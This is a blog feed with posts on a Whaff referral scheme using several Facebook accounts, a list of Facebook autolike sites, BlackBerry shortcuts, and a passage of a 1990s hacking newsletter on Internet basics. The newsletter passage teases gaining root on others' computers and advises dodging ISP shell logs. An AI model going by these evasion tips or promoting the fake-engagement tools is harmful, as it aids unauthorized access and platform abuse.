tag:blogger.com,1999:blog-61311193573934762942024-03-05T16:56:11.805-08:00salazarneosalazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.comBlogger113125tag:blogger.com,1999:blog-6131119357393476294.post-47743034805529025362015-02-10T07:54:00.000-08:002015-02-10T07:54:08.529-08:00mungkin sudah banyak yang membahas tentang whaff, kalo belom GTG!!!<br />so gue langsung ke intinya aja<br />bagimana cara dapat >$10/hari<br /><br />trik 1 : $7 - $10/hari<br />bahan<br /><br />-pc/laptop<br />-bluestack<br />-2 akun facebook<br />- deep freeze<br /><br />trik 2 : $12/hari<br />bahan<br />-2 hp android (1 hp musti ROOTED)<br />-2 akun fb ( jangan gunakan akun di trik 1 -waspada banned-, kecuali untuk akun utama )<br /><br />untuk keterangan selanjutnya akan gue kirim kalo kalian gunakan kode "<span style="font-size: large;"><b><span style="color: #990000;">AQ21219</span></b></span>" pm ke gue,tutorial akan dikirim via email sekalian sama link videonya<br />khusus yang gunakan kode "<span style="font-size: large;"><b>AQ21219</b></span>" pada 2 hp, akan gue kasih trick 2<br /><br />ingat kalo sudah gunakan kode "<span style="font-size: large;">AQ21219</span>" langsung pm ke gue!!!salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-54458527301322622382012-10-26T08:05:00.000-07:002012-10-26T08:05:00.306-07:00kumpulan autolikekumpulan facebook autolike<br />
http://cybertasik.tk/<br />http://balikita.info/autolike/<br />http://www.statusliker.org/<br />http://sijokjose.com/facebook/autolike/default.asp<br />http://autoliker.pro.tc/<br />http://littlehaow.onhacker.com/<br />http://autolike.hublaa.net/ <br />http://autolikealgeria.eb2a.com/ <br />http://www.idbomblike.com/<br />http://pakai-aja.nazuka.net/<br />http://autolike.id-fb.com/<br />http://www.beingharami.in/Auto-Liker/<br />http://arisan-jempool.blogspot.com/<br />http://di.hostingkan.com/like/<br />http://di.hostingkan.com/liker/ <br />http://www.wholesaleengravablegifts.com/like.php<br />http://powerlike.net/<br />http://powerlike.org/ <br />http://www.maholike.net/<br />http://arekdeso.16mb.com/liker/<br />http://root.hackz.name/<br />http://fb-autolike.com/<br />http://fb-autolikes.webs.com/<br />http://an-ion.xtgem.com/Menu/autosuka<br />http://autolikebot.net/<br />http://www.postliker.co.cc/<br />http://g.endut.net/<br />http://cyberzombie.tk/<br />http://testajerkk.site88.net/<br />http://dimana.blogku.biz/<br />http://ninetysevenxz.net/<br />http://expert-free.net/<br />http://extreme-likers.tk/<br />http://likextreme.com/<br />http://autolikephc.co.cc/<br />http://likeabugger.weebly.com/<br />http://oyeahlike.weebly.com/<br />http://wendellocampo.weebly.com/<br />http://like.vipfree.us/<br />http://www.likehoot.com/<br />http://dimana.blogku.biz/<br />http://www.likehoot.com/ <br />http://fb-autoliker.com/<br />http://www.ninetysevenxz.net/AutoLike-MY<br />http://www.zonedevil.org/AutoLiker/<br />http://www.moleckcyber.com/<br />http://www.autolike.org/<br />http://e-zonal.com/like.php/<br />http://www.autolike.id.web.id/<br />http://www.likehoot.com/<br />http://megaliker.tk <br />http://fb-autoliker.com/salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-44703065858225847552012-02-24T02:22:00.000-08:002012-02-24T02:22:00.783-08:00<br />Shortcut Untuk Blackberry Anda<br /><br />1. Shortcut telepon<br />* Untuk mengubah nada dering Anda, dalam aplikasi telepon, tekan tombol Menu. Klik Setel Nada Dering.<br />* Untuk mengecek pesan suara Anda, tekan dan tahan 1.<br />* Untuk mengirim sebuah panggilan masuk ke pesan suara saat perangkat dimasukkan dalam holster, tekan dan tahan tombol Volume Turun.<br />* Untuk melihat daftar kontak Anda dalam aplikasi telepon, tekan dan tahan tombol Kirim.<br />* Untuk menyetel nomor panggil cepat ke sebuah kontak, pada layar Asal dalam aplikasi telepon, tekan dan tahan sebuah tombol yang ingin Anda tetapkan untuk panggil cepat.<br />* Untuk menambahkan ekstensi ke nomor telepon, tekan tombol Alt dan tombol X. Ketikkan nomor ekstensi.<br />* Untuk mengetikkan ekstensi dalam field nomor telepon, tekan tombol Alt dan tombol huruf.<br />* Untuk menyisipkan tanda tambah (+) saat mengetikkan nomor telepon, tekan tombol O.<br />* Untuk mengaktifkan speaker ponsel selama panggilan, tekan tombol Speaker Ponsel. Untuk menonaktifkan speaker ponsel selama panggilan, tekan lagi tombol Speaker Ponsel.<br />* Untuk mendengarkan panggilan dengan headphone berkabel, tekan tombol Speaker Ponsel. Untuk berhenti mendengarkan panggilan dengan headphone berkabel, tekan lagi tombol Speaker Ponsel.<br />Untuk memindah nomor telepon, dalam aplikasi telepon, klik nomor telepon aktif Anda. Klik nomor telepon.<br /><br />2. Shortcut pesan<br />Dalam pesan<br />* Untuk membalas sebuah pesan, tekan R.<br />* Untuk membalas ke semua dalam pesan email atau pesan PIN, tekan L.<br />* Untuk meneruskan sebuah pesan, tekan F.<br />* Untuk menyimpan ke file sebuah pesan email yang disorot, tekan I.<br />* Untuk melihat alamat email kontak, sorot kontak dalam Ke atau Dari. Tekan Q. Untuk melihat nama tampilan, tekan lagi Q.<br />* Untuk pindah ke posisi kursor terakhir setelah menutup dan membuka kembali sebuah pesan atau pesan PIN yang telah diterima, tekan G.<br /><br />Dalam daftar pesan<br />* Untuk membuka pesan yang disorot, tekan tombol Enter.<br />* Untuk membuat pesan dari daftar pesan, tekan C.<br />* Untuk menandai pesan sebagai telah dibuka atau belum dibuka, tekan tombol Alt dan U.<br />* Untuk melihat pesan yang diterima dan log panggilan yang diterima, tekan tombol Alt dan I.<br />* Untuk melihat pesan yang dikirim, tekan tombol Alt dan O.<br />* Untuk melihat pesan suara, tekan tombol Alt dan V.<br />* Untuk melihat pesan teks SMS, tekan tombol Alt dan S.<br />* Untuk melihat log panggilan, tekan tombol Alt dan P.<br />* Untuk melihat semua pesan Anda, tekan tombol Escape.<br /><br />Berpindah dalam daftar pesan<br />* Untuk naik satu layar, tekan tombol Shift dan tombol Space.<br />* Untuk turun satu layar, tekan tombol Space.<br />* Untuk pindah ke atas daftar pesan, tekan T.<br />* Untuk pindah ke bawah daftar pesan, tekan B.<br />* Untuk pindah ke tanggal berikutnya, tekan N.<br />* Untuk pindah ke tanggal sebelumnya, tekan P.<br />* Untuk pindah ke item yang belum dibuka, tekan U.<br />* Untuk pindah ke pesan terkait berikutnya, tekan J.<br />* Untuk pindah ke pesan terkait sebelumnya, tekan K.<br /><br />3. Shortcut kamera dan kamera video<br />Tergantung pada perangkat BlackBerry® Anda, fitur kamera video atau kamera mungkin tidak didukung.<br />* Untuk memperbesar sasaran sebelum memotret, tekan tombol Volume Naik.<br />* Untuk memperkecil sasaran sebelum memotret, tekan tombol Volume Turun.<br />* Untuk memotret, tekan tombol Praktis Kanan.<br />* Untuk mengubah mode lampu kilat bagi gambar atau untuk mengaktifkan mode kurang-cahaya bagi video, tekan tombol Space.<br /><br />4. Shortcut media<br />* Untuk menghentikan video atau lagu, tekan tombol Bungkam. Untuk melanjutkan memainkan video atau lagu, tekan lagi tombol Bungkam.<br />* Untuk memainkan lagu berikutnya dalam sebuah kategori, tekan N.<br />* Untuk memainkan lagu sebelumnya dalam sebuah kategori, tekan P.<br />* Untuk memainkan lagu berikutnya dalam daftar putar, tekan dan tahan tombol Volume Naik.<br />* Untuk memainkan lagu sebelumnya dalam daftar putar, tekan dan tahan tombol Volume Turun.<br />* Untuk mengaktifkan fitur penguat audio untuk memperkuat volume lagu, nada dering, dan video, tekan tombol Volume Naik hingga Anda mencapai setelan volume tertinggi, kemudian tekan dengan cepat tombol Volume Naik sebanyak empat kali.<br />* Untuk menggerakkan ke atas dalam sebuah gambar, tekan 2.<br />* Untuk menggerakkan ke bawah dalam sebuah gambar, tekan 8.<br />* Untuk menggerakkan ke kanan dalam sebuah gambar, tekan 6.<br />* Untuk menggerakkan ke kiri dalam sebuah gambar, tekan 4.<br />* Untuk kembali ke tengah gambar, tekan 5.<br />* Untuk memperbesar gambar, tekan 3. Untuk mengembalikan ukuran gambar aslinya, tekan 7.<br />* Untuk memperkecil gambar, tekan 9. Untuk mengembalikan ukuran gambar aslinya, tekan 7.<br />* Untuk memutar gambar, tekan L.<br />* Agar gambar pas dengan ukuran layar, tekan 1.<br /><br />5. Shortcut pengetikan<br />* Untuk menyisipkan titik, tekan tombol Space dua kali. Huruf berikutnya menjadi huruf besar.<br />* Untuk mengubah jadi huruf besar, tahan tombol huruf hingga muncul huruf besar.<br />* Untuk mengetikkan karakter pengganti pada tombol, tekan tombol Alt dan tombol karakter tersebut<br />* Untuk mengetikkan karakter beraksen atau khusus, tahan tombol huruf dan putar trackball ke kiri atau ke kanan. Misalnya, untuk mengetikkan ü, tahan U dan putar trackball ke kiri hingga muncul ü. Lepaskan tombol huruf bila karakter beraksen atau khusus telah muncul.<br />* Untuk mengetikkan angka dalam field nomor, tekan tombol angka. Anda tidak perlu menekan tombol Alt.<br />* Untuk mengetikkan angka dalam field teks, tahan tombol Alt dan tekan tombol angka.<br />* Untuk mengaktifkan NUM lock, tekan tombol Alt dan tombol Shift Kiri. Untuk menonaktifkan NUM lock, tekan tombol Shift.<br />* Untuk mengaktifkan CAP lock, tekan tombol Alt dan tombol Shift Kanan. Untuk menonaktifkan CAP lock, tekan tombol Shift.<br /><br />Menyisipkan simbol<br />* Untuk menyisipkan tanda (@) atau titik (.) dalam field alamat email, tekan tombol Space.<br />* Untuk mengetikkan sebuah simbol, tekan tombol Simbol. Ketikkan huruf yang muncul di bawah simbol tersebut.<br /><br />Menggunakan teks<br />* Untuk menyorot sebaris teks, tekan tombol Shift dan putar trackball ke atas atau ke bawah.<br />* Untuk menyorot teks karakter demi karakter, tahan tombol Shift dan putar trackball ke kiri atau ke kanan.<br />* Untuk membatalkan pemilihan teks, tekan tombol Escape.<br />* Untuk memotong teks yang disorot saat mengetik, tekan tombol Shift dan tombol Backspace/Hapus.<br />* Untuk menyalin teks yang disorot saat mengetik, tekan tombol Alt dan klik trackball.<br />* Untuk menempelkan teks yang disorot saat mengetik, tekan tombol Shift dan klik trackball.<br /><br />6. Shortcut pencarian<br />* Untuk mencari kontak dalam daftar kontak, ketikkan nama kontak atau inisialnya dengan dipisahkan oleh spasi.<br />* Untuk mencari teks dalam pesan, tekan S.<br />* Untuk mencari teks dalam lampiran atau pada halaman web, tekan F.<br />* Untuk mencari teks dalam presentasi, Anda harus melihat presentasi tersebut dalam tampilan teks atau dalam teks atau dalam tampilan slide. Tekan F.<br /><br />7. Shortcut browser<br />* Untuk menyisipkan titik (.) dalam field alamat web, tekan tombol Space.<br />* Untuk menyisipkan garis miring (/) dalam field alamat web, tekan tombol Shift dan tombol Space.<br />* Untuk menghentikan pemuatan halaman web, tekan tombol Escape.<br />* Untuk menutup browser, tekan dan tahan tombol Escape.<br /><br />Pada halaman web<br />* Untuk berpindah antara tampilan Kolom dan tampilan Halaman, tekan Z.<br />* Untuk memperbesar tampilan halaman web, tekan I.<br />* Untuk memperkecil tampilan halaman web, tekan O.<br />* Untuk pindah ke halaman web tertentu, tekan G.<br />* Untuk kembali ke halaman asal, tekan H.<br />* Untuk mengaktifkan dukungan JavaScript, tekan J.<br />* Untuk membuka daftar bookmark, tekan K.<br />* Untuk menambahkan bookmark, tekan A.<br />* Untuk melihat daftar halaman web yang baru saja Anda kunjungi, tekan Y.<br />* Untuk memperbarui halaman web, tekan R.<br />* Untuk melihat alamat halaman Web sebuah link, sorot link tersebut. Tekan L.<br />* Untuk melihat alamat sebuah halaman Web, tekan P.<br />* Untuk mengikuti sebuah link, sorot atau berhenti pada pada link tersebut. Tekan tombol Enter.<br />* Untuk menyembunyikan spanduk, tekan U. Untuk melihat spanduk, tekan U.<br />* Untuk membuka opsi browser, dalam browser, tekan S.<br /><br />Menyusuri halaman web<br />* Untuk naik satu layar, tekan tombol Shift dan tombol Space.<br />* Untuk turun satu layar, tekan tombol Space.<br />* Untuk pindah ke atas halaman web, tekan T.<br />* Untuk pindah ke bawah halaman web, tekan B.salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-5845577713682793872012-02-24T02:21:00.000-08:002012-02-24T02:21:26.255-08:00Hacking for DummiesContents of Volume 2: <br />Internet for Dummies <br />Linux! <br />Introduction to TCP/IP <br />Port Surfing! <br />____________________________________________________________ <br />Vol. 2 Number 1 <br />Internet for Dummies -- skip this if you are a Unix wizard. But if you read on you’ll get some more kewl hacking instructions. <br />____________________________________________________________ <br />The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately into how-to hacking tricks. But if you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets a little dizzying. <br />So how about catching our breath, standing back and reviewing what the heck it is that we are playing with? Once we get the basics under control, we then can move on to serious hacking. <br />Also, I have been wrestling with my conscience over whether to start giving you step-by-step instructions on how to gain root access to other peoples’ computers. The little angel on my right shoulder whispers, “Gaining root without permission on other people’s computers is not nice. So don’t tell people how to do it.” The little devil on my left shoulder says, “Carolyn, all these hackers think you don’t know nothin’! PROOVE to them you know how to crack!” The little angel says, “If anyone reading Guide to (mostly) Harmless Hacking tries out this trick, you might get in trouble with the law for conspiracy to damage other peoples’ computers.” The little devil says, “But, Carolyn, tell people how to crack into root and they will think you are KEWL!” <br />So here’s the deal. In this and the next few issues of Guide to (mostly) Harmless Hacking I’ll tell you several ways to get logged on as the superuser in the root account of some Internet host computers. But the instructions will leave a thing or two to the imagination. <br />My theory is that if you are willing to wade through all this, you probably aren’t one of those cheap thrills hacker wannabes who would use this knowledge to do something destructive that would land you in jail. <br />***************************** <br />Technical tip: If you wish to become a *serious* hacker, you’ll need Linux (a freeware variety of Unix) on your PC. One reason is that then you can crack into root legally all you want -- on your own computer. It sure beats struggling around on someone else’s computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI laugh at you all the way to jail. <br />Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM and as little as 20 MB of hard disk. You will need to reformat your hard disk. While some people have successfully installed Linux without trashing their DOS/Windows stuff, don’t count on getting away with it. Backup, backup, backup! <br />***************************** <br />***************************** <br />You can go to jail warning: Crack into root on someone else’s computer and the slammer becomes a definite possibility. Think about this: when you see a news story about some hacker getting busted, how often do you recognize the name? How often is the latest bust being done to someone famous, like Dark Tangent or se7en or Emmanuel Goldstein? How about, like, never! That’s because really good hackers figure out how to not do stupid stuff. They learn how to crack into computers for the intellectual challenge and to figure out how to make computers safe from intruders. They don’t bull their way into root and make a mess of things, which tends to inspire sysadmins to call the cops. <br />********************************* <br />Exciting notice: Is it too boring to just hack into your own Linux machine? Hang in there. Ira Winkler of the National Computer Security Association, Dean Garlick of the Space Dynamics Lab of Utah State University and I are working on setting up hack.net, a place where it will be legal to break into computers. Not only that, we’re looking for sponsors who will give cash awards and scholarships to those who show the greatest hacking skills. Now does that sound like more phun than jail? <br />***************************** <br />So, let’s jump into our hacking basics tutorial with a look at the wondrous anarchy that is the Internet. <br />Note that these Guides to (mostly) Harmless Hacking focus on the Internet. That is because there are many legal ways to hack on the Internet. Also, there are over 10 million of these readily hackable computers on the Internet, and the number grows every day. <br />Internet Basics <br />No one owns the Internet. No one runs it. It was never planned to be what it is today. It just happened, the mutant outgrowth of a 1969 US Defense Advanced Research Projects Agency experiment. <br />This anarchic system remains tied together because its users voluntarily obey some basic rules. These rules can be summed up in two words: Unix and TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an Uberhacker among hacker wannabes, a master of the Internet universe. <br />To get technical, the Internet is a world-wide distributed computer/communications network held together by a common communications standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit of UUCP. These standards allow anyone to hook up a computer to the Internet, which then becomes another node in this network of the Internet. All that is needed is to get an Internet address assigned to the new computer, which is then known as an Internet "host," and tie into an Internet communications link. These links are now available in almost all parts of the world. <br />If you use an on-line service from your personal computer, you, too, can temporarily become part of the Internet. There are two main ways to hook up to an on-line service. <br />There is the cybercouch potato connection that every newbie uses. It requires either a point-to-point (PPP) or SLIPconnection, which allows you to run pretty pictures with your Web browser. If you got some sort of packaged software from your ISP, it automatically gives you this sort of connection. <br />Or you can connect with a terminal emulator to an Internet host. This program may be something as simple as the Windows 3.1 “Terminal” program under the “Accessories” icon. Once you have dialed in and connected you are just another terminal on this host machine. It won’t give you pretty pictures. This connection will be similar to what you get on an old-fashioned BBS. But if you know how to use this kind of connection, it could even give you root access to that host. <br />But how is the host computer you use attached to the Internet? It will be running some variety of the Unix operating system. Since Unix is so easy to adapt to almost any computer, this means that almost any computer may become an Internet host. <br />For example, I sometimes enter the Internet through a host which is a Silicon Graphics Indigo computer at Utah State University. Its Internet address is fantasia.idec.sdl.usu.edu. This is a computer optimized for computer animation work, but it can also operate as an Internet host. On other occasions the entry point used may be pegasus.unm.edu, which is an IBM RS 6000 Model 370. This is a computer optimized for research at the University of New Mexico. <br />Any computer which can run the necessary software -- which is basically the Unix operating system -- has a modem, and is tied to an Internet communications link, may become an Internet node. Even a PC may become an Internet host by running one of the Linux flavors of Unix. After setting it up with Linux you can arrange with the ISP of your choice to link it permanently to the Internet. <br />In fact, many ISPs use nothing more than networked PCs running Linux! <br />As a result, all the computing, data storage, and sending, receiving and forwarding of messages on the Internet is handled by the millions of computers of many types and owned by countless companies, educational institutions, governmental entities and even individuals. <br />Each of these computers has an individual address which enables it to be reached through the Internet if hooked up to a appropriate communications link. This address may be represented in two ways: as a name or a number. <br />The communications links of the Internet are also owned and maintained in the same anarchic fashion as the hosts. Each owner of an Internet host is responsible for finding and paying for a communications link that will get that host tied in with at least one other host. Communications links may be as simple as a phone line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic link. As long as the communications link can use TCP/IP or UUCP, it can fit into the Internet. <br />Thus the net grows with no overall coordination. A new owner of an Internet host need only get permission to tie into one communications link to one other host. Alternatively, if the provider of the communications link decides this host is, for example, a haven for spammers, it can cut this “rogue site” off of the Internet. The rogue site then must snooker some other communications link into tying it into the Internet again. <br />The way most of these interconnected computers and communications links work is through the common language of the TCP/IP protocol. Basically, TCP/IP breaks any Internet communication into discrete "packets." Each packet includes information on how to rout it, error correction, and the addresses of the sender and recipient. The idea is that if a packet is lost, the sender will know it and resend the packet. Each packet is then launched into the Internet. This network may automatically choose a route from node to node for each packet using whatever is available at the time, and reassembles the packets into the complete message at the computer to which it was addressed. <br />These packets may follow tortuous routes. For example, one packet may go from a node in Boston to Amsterdam and back to the US for final destination in Houston, while another packet from the same message might be routed through Tokyo and Athens, and so on. Usually, however, the communications links are not nearly so torturous. Communications links may include fiber optics, phone lines and satellites. <br />The strength of this packet-switched network is that most messages will automatically get through despite heavy message traffic congestion and many communications links being out of service. The disadvantage is that messages may simply disappear within the system. It also may be difficult to reach desired computers if too many communications links are unavailable at the time. <br />However, all these wonderful features are also profoundly hackable. The Internet is robust enough to survive -- so its inventors claim -- even nuclear war. Yet it is also so weak that with only a little bit of instruction, it is possible to learn how to seriously spoof the system (forged email) or even temporarily put out of commission other people's Internet host computers (flood pinging, for example.) <br />On the other hand, the headers on the packets that carry hacking commands will give away the account information from which a hacker is operating. For this reason it is hard to hide perfectly when on the Internet. <br />It is this tension between this power and robustness and weakness and potential for confusion that makes the Internet a hacker playground. <br />For example, HERE IS YOUR HACKER TIP YOU’VE BEEN WAITING FOR THIS ISSUE: <br />ftp://ftp.secnet.com <br />This ftp site was posted on the BUGTRAQ list, which is dedicated to discussion of Unix security holes. Moderator is Aleph One, who is a genuine Uberhacker. If you want to subscribe to the BUGTRAQ, email LISTSERV@netspace.org with message “subscribe BUGTRAQ.” <br />Now, back to Internet basics. <br />History of Internet <br />As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because of its value in scientific research, the US National Science Foundation (NSF) took it over in 1983. But over the years since then it gradually evolved away from any single source of control. In April 1995 NSF cut the last apron strings. Now the Internet is run by no one. It just happens and grows out of the efforts of those who play with it and struggle with the software and hardware. <br />Nothing at all like this has ever happened before. We now have a computer system with a life of its own. We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing stronger. We also form a big part of the immune system of this exotic creature. <br />The original idea of ARPANET was to design a computer and communications network that would eventually become so redundant, so robust, and so able to operate without centralized control, that it could even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived the end of government funding without even a blip in its growth. Thus its anarchic offspring, the Internet, has succeeded beyond the wildest dreams of its original architects. <br />The Internet has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it contained only 1000 hosts. But over the next 5 years this number grew tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold to 1 million (1993). Two years later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant child of ARPANET. <br />In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the communications links among nodes is too small, and it were to become seriously bogged down, it might be difficult to fix the problem. <br />For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on the Internet commonly known as the “Morris Worm.” This virus would make copies of itself on whatever computer it was on and then send copies over communications links to other Internet hosts. (It used a bug in sendmail that allowed access to root, allowing the virus to act as the superuser). <br />Quickly the exponential spread of this virus made the Internet collapse from the communications traffic and disk space it tied up. <br />At the time the Internet was still under some semblance of control by the National Science Foundation and was connected to only a few thousand computers. The Net was shut down and all viruses purged from its host computers, and then the Net was put back into operation. Morris, meanwhile, was put in jail. <br />There is some concern that, despite improved security measures (for example, "firewalls"), someone may find a new way to launch a virus that could again shut down the Internet. Given the loss of centralized control, restarting it could be much more time-consuming if this were to happen again. <br />But reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to be impossible. Even if it were possible, the original ARPANET architects were probably correct in their assessment that the Net would become more susceptible for massive failure rather than less if some centralized control were in place. <br />Perhaps the single most significant feature of today's Internet is this lack of centralized control. No person or organization is now able to control the Internet. In fact, the difficulty of control became an issue as early as its first year of operation as ARPANET. In that year email was spontaneously invented by its users. To the surprise of ARPANET's managers, by the second year email accounted for the bulk of the communication over the system. <br />Because the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the technology to control the system. The proliferation of parallel communications links and hosts had by then completely bypassed any possibility of centralized control. <br />There are several major features of the Internet: <br />* World Wide Web -- a hypertext publishing network and now the fastest growing part of the Internet. <br />* email -- a way to send electronic messages <br />* Usenet -- forums in which people can post and view public messages <br />* telnet -- a way to login to remote Internet computers <br />* file transfer protocol -- a way to download files from remote Internet computers <br />* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers <br />* gopher -- a way of cataloging and searching for information. This is rapidly growing obsolete. <br />As you port surfers know, there are dozens of other interesting but less well known services such as whois, finger, ping etc. <br />The World Wide Web <br />The World Wide Web is the newest major feature of the Internet, dating from the spring of 1992. It consists of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols on each page to other Web pages. These pages and links together create what is known as "hypertext." This technique makes it possible to tie together many different documents which may be written by many people and stored on many different computers around the world into one hypertext document. <br />This technique is based upon the Universal Resource Locator (URL) standard, which specifies how to hook up with the computer and access the files within it where the data of a Web page may be stored. <br />A URL is always of the form http://<rest of address>, where <rest of address> includes a domain name which must be registered with an organization called InterNIC in order to make sure that two different Web pages (or email addresses, or computer addresses) don't end up being identical. This registration is one of the few centralized control features of the Internet. <br />Here's how the hypertext of the World Wide Web works. The reader would come to a statement such as "our company offers LTL truck service to all major US cities." If this statement on the "Web page" is highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page with details. These may include complete schedules and a form to fill out to order a pickup and delivery. <br />Some Web pages even offer ways to make electronic payments, usually through credit cards. <br />However, the security of money transfers over the Internet is still a major issue. Yet despite concerns with verifiability of financial transactions, electronic commerce over the Web is growing fast. In its second full year of existence, 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card information. <br />In addition, the Web is being used as a tool in the distribution of a new form of currency, known as electronic cash. It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash (often called ecash) may play a major role in the world economy, simplifying international trade. It may also eventually make national currencies and even taxation as we know it obsolete. <br />Examples of Web sites where one may obtain ecash include the Mark Twain Bank of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.com). <br />The almost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a Web page does not need to get permission or make any arrangement with the authors of other Web pages to which he or she wishes to establish links. Links may be established automatically simply by programming in the URLs of desired Web page links. <br />Conversely, the only way the author of a Web page can prevent other people from reading it or establishing hypertext links to it is to set up a password protection system (or by not having communications links to the rest of the Internet). <br />A problem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer up to the Internet, so also there is no central authority with control or even knowledge of what is published where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web page. <br />Once a user knows the address (URL) of a Web page, or at least the URL of a Web page that links eventually to the desired page, then it is possible (so long as communications links are available) to almost instantly hook up with this page. <br />Because of the value of knowing URLs, there now are many companies and academic institutions that offer searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to hypertext link. But because the Web is constantly growing and changing, there is no way to create a comprehensive catalog of the entire Web. <br />Email <br />Email is the second oldest use of the Internet, dating back to the ARPAnet of 1972. (The first use was to allow people to remotely log in to their choice of one of the four computers on which ARPAnet was launched in 1971.) <br />There are two major uses of email: private communications, and broadcasted email. When broadcasted, email serves to make announcements (one-way broadcasting), and to carry on discussions among groups of people such as our Happy Hacker list. In the group discussion mode, every message sent by every member of the list is broadcasted to all other members. <br />The two most popular program types used to broadcast to email discussion groups are majordomo and listserv. <br />Usenet <br />Usenet was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists is that there was no easy way for people new to these groups to join them. Another problem is that as the group grows, a member may be deluged with dozens or hundreds of email messages each day. <br />In 1979 these problems were addressed by the launch of Usenet. Usenet consists of news groups which carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored, typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts belong. <br />With many Internet connection programs you can see the similarities between Usenet and email. Both have similar headers, which track their movement across the Net. Some programs such as Pine are sent up to send the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow you to email the authors of posts, and many also allow you to email these posts themselves to yourself or other people. <br />Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to (mostly) Harmless Hacking: <br />1. Unix <br />We discuss “shells” which allow one to write programs (“scripts”) that automate complicated series of Unix commands. The reader is introduced to the concept of scripts which perform hacking functions. We introduce Perl, which is a shell programming language used for the most elite of hacking scripts such as SATAN. <br />3. TCP/IP and UUCP <br />This chapter covers the communications links that bind together the Internet from a hackers' perspective. Extra attention is given to UUCP since it is so hackable. <br />4. Internet Addresses, Domain Names and Routers <br />The reader learns how information is sent to the right places on the Internet, and how hackers can make it go to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is included. <br />5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions <br />This section lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other peoples' computers. Yet these hacks we teach are 100% legal! <br />_________________________________________________________ <br />Want to subscribe to this list? Email hacker@techbroker.com with the message “subscribe happyhacker.” Want to share some kewl stuph with the Happy Hacker list? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking! <br />Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.. <br />________________________________________________________ <br />________________________________________ <br />GUIDE TO (mostly) HARMLESS HACKING <br />Vol. 2 Number 2 <br />Linux! <br />________________________________________ <br />Unix has become the primo operating system of the Internet. In fact, Unix is the most widely used operating system in the world among computers with more power than PCs. <br />True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its wonderful flavors still is the operating system to know in order to be a truly elite hacker. <br />So far we have assumed that you have been hacking using a shell account that you get through your Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's computers. But you don't need to depend on your ISP for a machine that lets you play with Unix. You can run Unix on your own computer and with a SLIP or PPP connection be directly connected to the Internet. <br />*********************** <br />Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet. You have to use either SLIP or PPP connections to get to use a Web browser that gives you pictures instead on text only. So if you can see pictures on the Web, you already have one of these available to you. <br />The advantage of using one of these direct connections for your hacking activities is that you will not leave behind a shell log file for your ISP's sysadmin to pore over. Even if you are not breaking the law, a shell log file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your account. <br />******************** <br />What is the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively available on CD-ROMs. <br />The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD is really, really good. But you con't find many manuals or newsgroups that cover FreeBSD. <br />Linux, however, has the advantage of being available in many variants (so you can have fun mixing and matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals, news groups, mail lists 